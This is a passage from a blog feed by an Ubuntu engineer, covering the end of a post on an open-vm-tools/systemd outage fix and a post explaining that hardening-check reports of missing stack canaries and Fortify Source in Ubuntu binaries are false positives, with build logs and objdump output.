open-vm-tools (2:11.0.5-4ubuntu0.18.04.2) bionic-security; urgency=medium
* SECURITY UPDATE: local privilege escalation
diff --git a/debian/open-vm-tools.postinst b/debian/open-vm-tools.postinst
index f181ab2..aa224fb 100644
--- a/debian/open-vm-tools.postinst
+++ b/debian/open-vm-tools.postinst
@@ -5,7 +5,7 @@ set -e
case "${1}" in
configure)
if which udevadm 1>/dev/null; then
- udevadm trigger || true
+ udevadm trigger --type=devices --subsystem-match=scsi || true
fi
;;
</code></pre></div></div>
<p>From the debdiff, we see it has been changed to <code class="language-plaintext highlighter-rouge">udevadm trigger --type=devices --subsystem-match=scsi</code> in
version <code class="language-plaintext highlighter-rouge">2:11.0.5-4ubuntu0.18.04.3</code>. Hopefully it will be an extra step to make
sure something like this doesn’t happen again on the next open-vm-tools SRU.</p>
<h2 id="ubuntu-security-podcast">Ubuntu Security Podcast</h2>
<p>A few days after the update was released, Alex Murray reached out and suggested
we have a debrief on the Ubuntu Security Podcast, where we talk about the
regression, what happened, how we worked to solve the issue, and give a brief
idea of how we tested and validated the fix.</p>
<p>Nishit spoke as well, and I enjoyed having the opportunity to be on the podcast.
Maybe I should make another appearance sometime.</p>
<p><a href="https://ubuntusecuritypodcast.org/episode-177/">Listen to Episode 177 of the Ubuntu Security Podcast</a></p>
<audio style="width: 100%" controls="" preload="none">
<source src="https://people.canonical.com/~amurray/USP/USP_E177.mp3" type="audio/mp3" />
</audio>
<h1 id="lessons-learned">Lessons Learned</h1>
<p>I think the key takeaways of this outage is the following:</p>
<ol>
<li>Keep calm, and think logically during an outage, even when the world is watching.</li>
<li>Never rush to deliver a fix, instead test and aim to get stakeholder signoff before release. They might think of something that you haven’t.</li>
<li>Ask for help from your immediate colleagues and across teams when you need it, it is not a sign of weakness, but a desire to deliver the best fix possible, the first time, and having advice from world class engineers drives you toward that goal, especially when you are under pressure.</li>
</ol>
<h1 id="conclusion">Conclusion</h1>
<p>Well, I hope you enjoyed the deep dive into the interesting, and very strange
case of a complex interaction between two packages causing a cloud wide outage.</p>
<p>It is not often that two packages interacting causes issues, most bugs are
caused within the package itself. But in this case, open-vm-tools primed the
systems just enough to bring a dormant systemd bug to the surface, over 4.5
years after initial release of Bionic.</p>
<p>We covered how we came up with the minimal reproducer, analysed the systemd bug,
and how we backported the fix, how we did not rush to put out a fix, and saved
us from another cloud wide outage as a result, to working together and valuing
everyone’s input to develop a successful preinstall script to fix already primed
systems, to delivering the fix worldwide.</p>
<p>Hopefully you enjoyed the read, and as always feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellDuring my work as a Sustaining Engineer at Canonical, occasionally I get tasked with analysing and fixing high profile regressions that turn into world ending emergencies. I think I have worked on four or five of these cases now, and behind each and every one there is a story to tell, and lessons to be learned. Today, we will dive into the intricate and complex series of events that caused the worldwide Azure AKS Cloud outage, for systems running Ubuntu 18.04 LTS, which I had the responsibility and leadership to resolve. So, go brew a cup of coffee or whip up a hot chocolate, and let’s recount the events that happened four months ago, and how we worked to resolve them without causing another world ending event to occur.Investigating Missing Stack Canaries and Fortify Source on Binaries2022-06-10T00:00:00+00:002022-06-10T00:00:00+00:00https://ruffell.nz/programming/writeups/2022/06/10/investigating-missing-stack-canaries-and-fortify-source<p>Not too long ago, I worked on a fairly interesting case where a user claimed
that many of the binaries on their system were missing Stack Canaries provided
through <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> and additionally, many were missing
Fortify Source being enabled through <code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code>.</p>
<p>This is most unusual, since these compiler flags, along with many others, are
enabled by default for all packages in the Ubuntu archive.</p>
<p><img src="/assets/images/2022_001.png" alt="hero" /></p>
<p>So in this writeup, we are going to investigate this user’s claims, and try get
to the bottom of the mystery of the missing compiler hardening options in
binaries from the Ubuntu archive. Stay tuned.</p>
<!--more-->
<h1 id="what-even-are-stack-canaries-and-fortify-source">What Even are Stack Canaries and Fortify Source?</h1>
<p>We are referring to a set of compiler flags that GCC and LLVM support in regard
to applying security hardening features to binaries at compile time, so that
they might be able to detect mischief at runtime. These flags are designed to
be implemented in any program, and the programmer doesn’t need to know they are
there for them to work.</p>
<h2 id="stack-canaries">Stack Canaries</h2>
<p>Stack Canaries provide a basic check to see if a buffer overflow has occurred
before we return from a function call, by popping the return address off the
stack and using it as the next instruction pointer to be executed.</p>
<p>If we add a “canary” at compile time, which is just a random number placed at
the end of the stack, when we go to return from the function, we test the number
on the stack versus what we expect it to be, and if it matches, it is likely no
buffer overflow has occurred, and we return. If it fails, we call a function
<code class="language-plaintext highlighter-rouge">__stack_chk_fail</code> which prints the below error, and kills the process, since
it is very likely something has overflowed the stack frame and it could be an
attacker trying to redirect the flow of execution to elsewhere in the program.</p>
<p>The error:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>*** stack smashing detected ***
Aborted
</code></pre></div></div>
<h2 id="fortify-source">Fortify Source</h2>
<p>Fortify Source builds on the idea of Stack Canaries, by adding a few more checks
to various functions to see if a buffer overflow has occurred. It instruments
functions like <code class="language-plaintext highlighter-rouge">memcpy</code>, <code class="language-plaintext highlighter-rouge">strcat</code> and <code class="language-plaintext highlighter-rouge">strncpy</code> and adds things like extra
length checks, checks flags for various buffers that have been allocated, that
sort of thing.</p>
<p>The compiler transparently replaces calls to normal <code class="language-plaintext highlighter-rouge">memcpy</code> etc with those of
the form <code class="language-plaintext highlighter-rouge">__memcpy_chk</code>.</p>
<h1 id="the-problem">The Problem</h1>
<p>The user opened a case, and provided a big list of binaries that seem to be
missing Stack Canaries, and Fortify Source protections, and didn’t offer much
more information. I already suspect that the user is running some sort of
automated testing tool over their system, and this was just the output.</p>
<p>For example, lets look at a freshly debootstrapped Jammy system:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Binaries missing Stack Canaries:
/usr/bin/clear
/usr/bin/dbus-uuidgen
/usr/bin/free
/usr/bin/getconf
/usr/bin/locale-check
/usr/bin/rev
/usr/bin/tabs
/usr/bin/tempfile
/usr/bin/xxd
/usr/sbin/findfs
/usr/sbin/fstab-decode
/usr/sbin/ldconfig.real
/usr/sbin/mklost+found
/usr/sbin/nologin
/usr/sbin/pivot_root
/usr/sbin/setcap
/usr/sbin/vcstime
Binaries missing Fortify Source:
/usr/bin/apt
/usr/bin/apt-cdrom
/usr/bin/apt-config
/usr/bin/apt-extracttemplates
/usr/bin/apt-get
/usr/bin/apt-mark
/usr/bin/apt-sortpkgs
/usr/bin/getconf
/usr/bin/getent
/usr/bin/iconv
/usr/bin/ischroot
/usr/bin/locale
/usr/bin/localedef
/usr/bin/pldd
/usr/bin/update-mime-database
/usr/bin/zdump
/usr/sbin/dmsetup
/usr/sbin/dmstats
/usr/sbin/iconvconfig
/usr/sbin/ldconfig.real
/usr/sbin/zic
</code></pre></div></div>
<p>The actual output was quite a bit longer, and more like the following list,
taken from a fresh Jammy Server VM with <code class="language-plaintext highlighter-rouge">devscripts</code> installed:</p>
<p><a href="/assets/bin/devscripts_missing_canaries_fortify_sources.txt">Example output from a system with more packages.</a></p>
<p>I was quite surprised at the amount of binaries which claim to have no Stack
Canaries present, and are also missing Fortify Sources protections. I thought
that this has to be a mistake, since these protections are enabled for all
packages by default.</p>
<h1 id="compiler-flags-set-in-ubuntu-by-default">Compiler Flags Set in Ubuntu by Default</h1>
<p>If you are ever wondering what compiler flags your binaries are built with by
default in the Ubuntu archive, have a read of the <a href="https://wiki.ubuntu.com/ToolChain/CompilerFlags">CompilerFlags</a>
wiki page.</p>
<h2 id="stack-canaries-1">Stack Canaries</h2>
<p>Reading the wiki page, <code class="language-plaintext highlighter-rouge">-fstack-protector</code> has been enabled for all packages
by default since Ubuntu 6.10, and was extended to include greater coverage in
more binaries being built with the stack protector with
<code class="language-plaintext highlighter-rouge">--param ssp-buffer-size=4</code> by default in 10.10.</p>
<p>Currently <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> is the default compiler flag, and this has
been enabled for all packages since 14.10.</p>
<h2 id="fortify-source-1">Fortify Source</h2>
<p>The wiki mentions <code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code> has been enabled for all packages since
8.10, which is a really long time. It does only apply to packages built with
<code class="language-plaintext highlighter-rouge">-O1</code> optimisation or higher, but I would expect the amount of packages not
using <code class="language-plaintext highlighter-rouge">-O2</code> or higher to be very low.</p>
<p>So why do we have so many binaries which claim to be missing these protections?</p>
<h1 id="manual-checking">Manual Checking</h1>
<p>A good quick way to check a binary is to examine the build log, and see if it
includes the compiler flags when the object file is being built.</p>
<h2 id="stack-canaries-2">Stack Canaries</h2>
<p>Lets take the first item off the list for missing Stack Canaries, <code class="language-plaintext highlighter-rouge">/usr/bin/clear</code>.</p>
<p><code class="language-plaintext highlighter-rouge">/usr/bin/clear</code> is part of the <code class="language-plaintext highlighter-rouge">ncurses-bin</code> package:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ apt-file search /usr/bin/clear
ncurses-bin: /usr/bin/clear
</code></pre></div></div>
<p>We can look this package up on Launchpad, <a href="https://launchpad.net/ubuntu/+source/ncurses/6.3-2">ncurses 6.3-2</a>
and from there find the <a href="https://launchpad.net/ubuntu/+source/ncurses/6.3-2/+build/23070422">build for Jammy</a>
and then we can examine the <a href="https://launchpadlibrarian.net/580830290/buildlog_ubuntu-jammy-amd64.ncurses_6.3-2_BUILDING.txt.gz">buildlog for Jammy</a></p>
<p>Eventually, we find where it is compiled:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc -DHAVE_CONFIG_H -I../progs -I. -I../../progs -I../include -I../../progs/../include
-Wdate-time -D_FORTIFY_SOURCE=2 -D_DEFAULT_SOURCE -D_XOPEN_SOURCE=600 -DNDEBUG
-g -O2 -ffile-prefix-map=/<<PKGBUILDDIR>>=. -flto=auto -ffat-lto-objects -flto=auto
-ffat-lto-objects -fstack-protector-strong -Wformat --param max-inline-insns-single=1200
-Werror=format-security -fPIC -c ../../progs/clear.c -o ../obj_s/clear.o
</code></pre></div></div>
<p>It very clearly has <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> enabled. This is a false positive.</p>
<h2 id="fortify-source-2">Fortify Source</h2>
<p>Again, lets take the first item off the list for missing Fortify Source,
<code class="language-plaintext highlighter-rouge">/usr/bin/apt</code>. This is obviously part of the <code class="language-plaintext highlighter-rouge">apt</code> package, so let’s find
<a href="https://launchpad.net/ubuntu/+source/apt/2.4.5">apt on launchpad</a>, and next
the <a href="https://launchpad.net/ubuntu/+source/apt/2.4.5/+build/23537350">build for Jammy</a>
and then the <a href="https://launchpadlibrarian.net/596069244/buildlog_ubuntu-jammy-amd64.apt_2.4.5_BUILDING.txt.gz">buildlog for Jammy</a>.</p>
<p>After looking for a long time, we come across:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[103/1085] : && /usr/bin/c++ -g -O2 -ffile-prefix-map=/<<PKGBUILDDIR>>=. -flto=auto
-ffat-lto-objects -flto=auto -ffat-lto-objects -fstack-protector-strong -Wformat
-Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -Wl,-Bsymbolic-functions
-flto=auto -ffat-lto-objects -flto=auto -Wl,-z,relro -Wl,-z,now -Wl,--as-needed
cmdline/CMakeFiles/apt.dir/apt.cc.o -o cmdline/apt -Wl,
-rpath,/<<PKGBUILDDIR>>/obj-x86_64-linux-gnu/apt-private:/<<PKGBUILDDIR>>/obj-x86_64-linux-gnu/apt-pkg:
apt-private/libapt-private.so.0.0.0 apt-pkg/libapt-pkg.so.6.0.0 && :
</code></pre></div></div>
<p>This also very clearly has <code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code> enabled. Another false positive.</p>
<h1 id="automated-scanning-tools">Automated Scanning Tools</h1>
<p>So, now we are beginning to suspect that whatever automated scanning tool was
being used is missing information and is not able to determine if these compiler
flags have been enabled or not.</p>
<p>Now we just need to find a tool and see how it works, so we can investigate its
shortcomings.</p>
<p>I came across the upstream <a href="https://wiki.debian.org/Hardening">debian hardening webpage</a>,
and found the validation section particularly interesting.</p>
<p>It suggested running “hardening-check” from the devscripts package, so I tried
that for a known good binary, such as /usr/bin/ls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ hardening-check /usr/bin/ls
/usr/bin/ls:
Position Independent Executable: yes
Stack protected: yes
Fortify Source functions: yes (some protected functions found)
Read-only relocations: yes
Immediate binding: yes
Stack clash protection: yes
Control flow integrity: yes
</code></pre></div></div>
<p>Okay, hardening-check can tell if the stack canary is present, and if fortify
source hardened functions are present.</p>
<p>I wrote up a quick script that calls <code class="language-plaintext highlighter-rouge">hardening-check</code>, and prints the binaries
“missing” Stack Canaries and Fortify Source to the output. This script is how
I created the two outputs in “The Problem” section.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">BINARIES</span><span class="o">=</span><span class="s2">"/usr/bin/* /usr/sbin/*"</span>
<span class="nb">echo</span> <span class="s2">"Binaries missing Stack Canaries:"</span>
<span class="k">for </span>f <span class="k">in</span> <span class="nv">$BINARIES</span>
<span class="k">do
</span>hardening-check <span class="nv">$f</span> 2> /dev/null | <span class="nb">grep</span> <span class="s2">"Stack protected"</span> | <span class="nb">grep</span> <span class="nt">-q</span> <span class="s2">"no"</span> <span class="o">&&</span> <span class="nb">echo</span> <span class="nv">$f</span>
<span class="k">done
</span><span class="nb">echo
echo</span> <span class="s2">"Binaries missing Fortify Source:"</span>
<span class="k">for </span>f <span class="k">in</span> <span class="nv">$BINARIES</span>
<span class="k">do
</span>hardening-check <span class="nv">$f</span> 2> /dev/null | <span class="nb">grep</span> <span class="s2">"Fortify Source"</span> | <span class="nb">grep</span> <span class="nt">-q</span> <span class="s2">"no"</span> <span class="o">&&</span> <span class="nb">echo</span> <span class="nv">$f</span>
<span class="k">done
</span><span class="nb">echo</span>
</code></pre></div></div>
<p>Okay, now we have an automated scanning tool of our own, lets dig into how it
works.</p>
<h1 id="investigation">Investigation</h1>
<p>I imagine what <code class="language-plaintext highlighter-rouge">hardening-check</code> is doing is dumping the dynamic symbol table
from the ELF header, and comparing those functions to hardened ones.</p>
<p>e.g.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/ls
/usr/bin/ls: file format elf64-x86-64
DYNAMIC SYMBOL TABLE:
00000 DF *UND* 00000 (GLIBC_2.3) __ctype_toupper_loc
00000 DF *UND* 00000 (GLIBC_2.2.5) getenv
00000 DO *UND* 00000 (GLIBC_2.2.5) __progname
00000 DF *UND* 00000 (GLIBC_2.2.5) sigprocmask
00000 DF *UND* 00000 (GLIBC_2.3.4) __snprintf_chk
00000 DF *UND* 00000 (GLIBC_2.2.5) raise
00000 DF *UND* 00000 (GLIBC_2.34) __libc_start_main
00000 DF *UND* 00000 (GLIBC_2.2.5) abort
00000 DF *UND* 00000 (GLIBC_2.2.5) __errno_location
00000 DF *UND* 00000 (GLIBC_2.2.5) strncmp
00000 w D *UND* 00000 Base _ITM_deregisterTMCloneTable
00000 DO *UND* 00000 (GLIBC_2.2.5) stdout
00000 DF *UND* 00000 (GLIBC_2.2.5) localtime_r
00000 DF *UND* 00000 (GLIBC_2.2.5) _exit
00000 DF *UND* 00000 (GLIBC_2.2.5) strcpy
00000 DF *UND* 00000 (GLIBC_2.4) __mbstowcs_chk
00000 DF *UND* 00000 (GLIBC_2.2.5) __fpending
00000 DF *UND* 00000 (GLIBC_2.2.5) isatty
00000 DF *UND* 00000 (GLIBC_2.2.5) sigaction
00000 DF *UND* 00000 (GLIBC_2.2.5) iswcntrl
00000 DF *UND* 00000 (GLIBC_2.2.5) wcswidth
00000 DF *UND* 00000 (GLIBC_2.2.5) localeconv
00000 DF *UND* 00000 (GLIBC_2.2.5) mbstowcs
00000 DF *UND* 00000 (GLIBC_2.2.5) readlink
00000 DF *UND* 00000 (GLIBC_2.17) clock_gettime
00000 DF *UND* 00000 (GLIBC_2.2.5) setenv
00000 DF *UND* 00000 (GLIBC_2.2.5) textdomain
00000 DF *UND* 00000 (GLIBC_2.2.5) fclose
00000 DO *UND* 00000 (GLIBC_2.2.5) optind
00000 DF *UND* 00000 (GLIBC_2.2.5) opendir
00000 DF *UND* 00000 (GLIBC_2.2.5) getpwuid
00000 DF *UND* 00000 (GLIBC_2.2.5) bindtextdomain
00000 DF *UND* 00000 (GLIBC_2.2.5) dcgettext
00000 DF *UND* 00000 (GLIBC_2.2.5) __ctype_get_mb_cur_max
00000 DF *UND* 00000 (GLIBC_2.2.5) strlen
00000 DF *UND* 00000 (GLIBC_2.4) __stack_chk_fail
00000 DF *UND* 00000 (GLIBC_2.2.5) getopt_long
00000 DF *UND* 00000 (GLIBC_2.2.5) mbrtowc
00000 DF *UND* 00000 (LIBSELINUX_1.0) freecon
00000 DF *UND* 00000 (GLIBC_2.2.5) strchr
00000 DF *UND* 00000 (GLIBC_2.2.5) getgrgid
00000 DF *UND* 00000 (GLIBC_2.2.5) snprintf
00000 DF *UND* 00000 (GLIBC_2.2.5) __overflow
00000 DF *UND* 00000 (GLIBC_2.2.5) strrchr
00000 DF *UND* 00000 (GLIBC_2.2.5) gmtime_r
00000 DF *UND* 00000 (GLIBC_2.2.5) lseek
00000 DF *UND* 00000 (GLIBC_2.2.5) __assert_fail
00000 DF *UND* 00000 (GLIBC_2.2.5) fnmatch
00000 DF *UND* 00000 (GLIBC_2.2.5) memset
00000 DF *UND* 00000 (GLIBC_2.2.5) ioctl
00000 DF *UND* 00000 (GLIBC_2.2.5) getcwd
00000 DF *UND* 00000 (GLIBC_2.2.5) closedir
00000 DF *UND* 00000 (GLIBC_2.33) lstat
00000 DF *UND* 00000 (GLIBC_2.2.5) memcmp
00000 DF *UND* 00000 (GLIBC_2.2.5) _setjmp
00000 DF *UND* 00000 (GLIBC_2.2.5) fputs_unlocked
00000 DF *UND* 00000 (GLIBC_2.2.5) calloc
00000 DF *UND* 00000 (GLIBC_2.2.5) strcmp
00000 DF *UND* 00000 (GLIBC_2.2.5) signal
00000 DF *UND* 00000 (GLIBC_2.2.5) dirfd
00000 DF *UND* 00000 (GLIBC_2.2.5) fputc_unlocked
00000 DO *UND* 00000 (GLIBC_2.2.5) optarg
00000 DF *UND* 00000 (GLIBC_2.3.4) __memcpy_chk
00000 DF *UND* 00000 (GLIBC_2.2.5) sigemptyset
00000 w D *UND* 00000 Base __gmon_start__
00000 DF *UND* 00000 (GLIBC_2.14) memcpy
00000 DO *UND* 00000 (GLIBC_2.2.5) program_invocation_name
00000 DF *UND* 00000 (GLIBC_2.2.5) tzset
00000 DF *UND* 00000 (GLIBC_2.2.5) fileno
00000 DF *UND* 00000 (GLIBC_2.2.5) tcgetpgrp
00000 DF *UND* 00000 (GLIBC_2.2.5) readdir
00000 DF *UND* 00000 (GLIBC_2.2.5) wcwidth
00000 DF *UND* 00000 (GLIBC_2.2.5) fflush
00000 DF *UND* 00000 (GLIBC_2.2.5) nl_langinfo
00000 DF *UND* 00000 (GLIBC_2.2.5) strcoll
00000 DF *UND* 00000 (GLIBC_2.2.5) mktime
00000 DF *UND* 00000 (GLIBC_2.2.5) __freading
00000 DF *UND* 00000 (GLIBC_2.2.5) fwrite_unlocked
00000 DF *UND* 00000 (GLIBC_2.2.5) realloc
00000 DF *UND* 00000 (GLIBC_2.2.5) stpncpy
00000 DF *UND* 00000 (GLIBC_2.2.5) setlocale
00000 DF *UND* 00000 (GLIBC_2.3.4) __printf_chk
00000 DF *UND* 00000 (GLIBC_2.28) statx
00000 DF *UND* 00000 (GLIBC_2.2.5) timegm
00000 DF *UND* 00000 (GLIBC_2.2.5) strftime
00000 DF *UND* 00000 (GLIBC_2.2.5) mempcpy
00000 DF *UND* 00000 (GLIBC_2.2.5) memmove
00000 DF *UND* 00000 (GLIBC_2.2.5) error
00000 DO *UND* 00000 (GLIBC_2.2.5) __progname_full
00000 DF *UND* 00000 (GLIBC_2.2.5) fseeko
00000 DF *UND* 00000 (GLIBC_2.2.5) strtoumax
00000 DF *UND* 00000 (GLIBC_2.2.5) unsetenv
00000 DF *UND* 00000 (GLIBC_2.2.5) __cxa_atexit
00000 DF *UND* 00000 (GLIBC_2.2.5) wcstombs
00000 DF *UND* 00000 (GLIBC_2.3) getxattr
00000 DF *UND* 00000 (GLIBC_2.2.5) gethostname
00000 DF *UND* 00000 (GLIBC_2.2.5) sigismember
00000 DF *UND* 00000 (GLIBC_2.2.5) exit
00000 DF *UND* 00000 (GLIBC_2.2.5) fwrite
00000 DF *UND* 00000 (GLIBC_2.3.4) __fprintf_chk
00000 w D *UND* 00000 Base _ITM_registerTMCloneTable
00000 DF *UND* 00000 (LIBSELINUX_1.0) getfilecon
00000 DF *UND* 00000 (GLIBC_2.2.5) fflush_unlocked
00000 DF *UND* 00000 (GLIBC_2.2.5) mbsinit
00000 DF *UND* 00000 (LIBSELINUX_1.0) lgetfilecon
00000 DO *UND* 00000 (GLIBC_2.2.5) program_invocation_short_name
00000 DF *UND* 00000 (GLIBC_2.2.5) iswprint
00000 DF *UND* 00000 (GLIBC_2.2.5) sigaddset
00000 DF *UND* 00000 (GLIBC_2.3) __ctype_tolower_loc
00000 DF *UND* 00000 (GLIBC_2.3) __ctype_b_loc
00000 DO *UND* 00000 (GLIBC_2.2.5) stderr
00000 DF *UND* 00000 (GLIBC_2.3.4) __sprintf_chk
220a0 g DO .data 00008 Base obstack_alloc_failed_handler
0fcc0 g DF .text 00128 Base _obstack_newchunk
0fca0 g DF .text 00019 Base _obstack_begin_1
106e0 g DF .text 00037 Base _obstack_allocated_p
00000 w DF *UND* 00000 (GLIBC_2.2.5) __cxa_finalize
00000 DF *UND* 00000 (GLIBC_2.2.5) free
0fc80 g DF .text 00015 Base _obstack_begin
00000 DF *UND* 00000 (GLIBC_2.2.5) malloc
107b0 g DF .text 00026 Base _obstack_memory_used
10720 g DF .text 00085 Base _obstack_free
</code></pre></div></div>
<p>We can see that the Stack Canary fail check is present:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ objdump -T /usr/bin/ls | grep __stack_chk_fail
00000 DF *UND* 00000 (GLIBC_2.4) __stack_chk_fail
</code></pre></div></div>
<p>We can also see some fortify source functions present:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/ls | grep chk
00000 DF *UND* 00000 (GLIBC_2.3.4) __snprintf_chk
00000 DF *UND* 00000 (GLIBC_2.4) __mbstowcs_chk
00000 DF *UND* 00000 (GLIBC_2.4) __stack_chk_fail
00000 DF *UND* 00000 (GLIBC_2.3.4) __memcpy_chk
00000 DF *UND* 00000 (GLIBC_2.3.4) __printf_chk
00000 DF *UND* 00000 (GLIBC_2.3.4) __fprintf_chk
00000 DF *UND* 00000 (GLIBC_2.3.4) __sprintf_chk
</code></pre></div></div>
<p>If <code class="language-plaintext highlighter-rouge">hardening-check</code> sees the presence of these functions, it says, yes, it
does have the compiler flag enabled. If they are missing, it reports, no, not
enabled.</p>
<p>Now we have a good idea how this scanning tool works, lets have a look at
a few examples.</p>
<h2 id="stack-canaries-3">Stack Canaries</h2>
<p><code class="language-plaintext highlighter-rouge">/usr/bin/clear</code> is the first item on the missing stack canary list. Let’s run it
through hardening check:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ hardening-check /usr/bin/clear
/usr/bin/clear:
Position Independent Executable: yes
Stack protected: no, not found!
Fortify Source functions: yes
Read-only relocations: yes
Immediate binding: yes
Stack clash protection: unknown, no -fstack-clash-protection instructions found
Control flow integrity: yes
</code></pre></div></div>
<p>Interesting, “Stack protected: no, not found!”.</p>
<p>Running it through objdump, we look for <code class="language-plaintext highlighter-rouge">__stack_chk_fail</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/clear | grep __stack_chk_fail
</code></pre></div></div>
<p>We get no output. The function isn’t present. We know from when we manually
checked the build log earlier that <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> is enabled.</p>
<p>So why don’t we see <code class="language-plaintext highlighter-rouge">__stack_chk_fail</code> referenced in the ELF header?</p>
<p>The answer is in the <a href="https://wiki.debian.org/Hardening">Hardening Wiki</a> page, again in the validation section:</p>
<blockquote>
<p>If your binary does not make use of character arrays on the stack, it’s
possible that “Stack protected” will report “no”, since there was no stack it
found to protect. If you absolutely want to protect all stacks, you can add
“-fstack-protector-all”, but this tends not to be needed, and there are some
trade-offs on speed.</p>
</blockquote>
<p>It is likely that <code class="language-plaintext highlighter-rouge">/usr/bin/clear</code> does not process any character arrays
on the stack, and thus, there is no need for stack canaries to be implemented,
and the compiler has made a conscious decision to omit them for performance
reasons.</p>
<p>Looking through the rest of the binaries listed under missing stack canaries,
most of them don’t do much string processing, making the above conclusion
reasonable.</p>
<h2 id="fortify-source-3">Fortify Source</h2>
<p>Let’s move onto the fortify source section.</p>
<p>The first item on the list is <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code>. Let’s run this through
hardening-check.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ hardening-check /usr/bin/apt
/usr/bin/apt:
Position Independent Executable: yes
Stack protected: yes
Fortify Source functions: unknown, no protectable libc functions used
Read-only relocations: yes
Immediate binding: yes
Stack clash protection: unknown, no -fstack-clash-protection instructions found
Control flow integrity: yes
</code></pre></div></div>
<p>Again, very interesting, we see <code class="language-plaintext highlighter-rouge">unknown, no protectable libc functions used</code>.</p>
<p>As mentioned previously, it is very likely looking for <code class="language-plaintext highlighter-rouge">__<function>_chk</code>
function calls in the ELF header, so let’s see what is present:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/apt -T | grep chk
00000 DF *UND* 00000 (GLIBC_2.4) __stack_chk_fail
</code></pre></div></div>
<p>We only seem to see chk functions related to the stack canary. I suppose this
is why hardening-check thinks fortify source is not enabled.</p>
<p>Again, from our manual checking of the buildlog, we know that
<code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code> as well as <code class="language-plaintext highlighter-rouge">-O2</code> are enabled, so the apt binary was built
with fortify source enabled. So why doesn’t it show up in the ELF dynamic symbol
table?</p>
<p>To answer this, we need to know what fortify source actually protects. This is
explained in the feature_test_macros manpage:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ man feature_test_macros
...
_FORTIFY_SOURCE (since glibc 2.3.4)
Defining this macro causes some lightweight checks to be performed to detect
some buffer overflow errors when employing various string and memory
manipulation functions (for example, memcpy(3), memset(3), stpcpy(3),
strcpy(3), strncpy(3), strcat(3), strncat(3), sprintf(3), snprintf(3),
vsprintf(3), vsnprintf(3), gets(3), and wide character variants thereof).
For some functions, argument consistency is checked; for example, a check is
made that open(2) has been supplied with a mode argument when the specified
flags include O_CREAT. Not all problems are detected, just some common cases.
...
Some of the checks can be performed at compile time (via macros logic
implemented in header files), and result in compiler warnings; other checks take
place at run time, and result in a run-time error if the check fails.
...
</code></pre></div></div>
<p>Okay, so Fortify Source adds some checks to the following functions and their
derivatives:</p>
<p><code class="language-plaintext highlighter-rouge">memcpy</code>, <code class="language-plaintext highlighter-rouge">memset</code>, <code class="language-plaintext highlighter-rouge">stpcpy</code>, <code class="language-plaintext highlighter-rouge">strcpy</code>, <code class="language-plaintext highlighter-rouge">strncpy</code>, <code class="language-plaintext highlighter-rouge">strcat</code>, <code class="language-plaintext highlighter-rouge">strncat</code>, <code class="language-plaintext highlighter-rouge">sprintf</code>,
<code class="language-plaintext highlighter-rouge">snprintf</code>, <code class="language-plaintext highlighter-rouge">vsprintf</code>, <code class="language-plaintext highlighter-rouge">vsnprintf</code>, <code class="language-plaintext highlighter-rouge">gets</code></p>
<p>Let’s check for these in <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/apt | grep 'memcpy\|memset\|stpcpy\|strcpy\|strncpy\|strcat\|strncat\|spri
ntf\|snprintf\|vsprintf\|vsnprintf\|gets'
</code></pre></div></div>
<p>We have our first explanation. If a binary does not call any of <code class="language-plaintext highlighter-rouge">memcpy</code>,
<code class="language-plaintext highlighter-rouge">memset</code>, <code class="language-plaintext highlighter-rouge">stpcpy</code>, <code class="language-plaintext highlighter-rouge">strcpy</code>, <code class="language-plaintext highlighter-rouge">strncpy</code>, <code class="language-plaintext highlighter-rouge">strcat</code>, <code class="language-plaintext highlighter-rouge">strncat</code>, <code class="language-plaintext highlighter-rouge">sprintf</code>,
<code class="language-plaintext highlighter-rouge">snprintf</code>, <code class="language-plaintext highlighter-rouge">vsprintf</code>, <code class="language-plaintext highlighter-rouge">vsnprintf</code>, <code class="language-plaintext highlighter-rouge">gets</code>, then the compiler doesn’t need to replace
them with their <code class="language-plaintext highlighter-rouge">__<function>_chk</code> equivalents, and thus it will fail the
Fortify Source check by hardening-check.</p>
<p>Now, I did examine <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code> under different releases and architectures,
and found it had a different result under arm64 on 20.04, that I think is worth
talking about:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/apt | grep 'memcpy\|memset\|stpcpy\|strcpy\|strncpy\|strcat\|strnca
t\|sprintf\|snprintf\|vsprintf\|vsnprintf\|gets'
00000 DF *UND* 00000 GLIBC_2.17 memcpy
</code></pre></div></div>
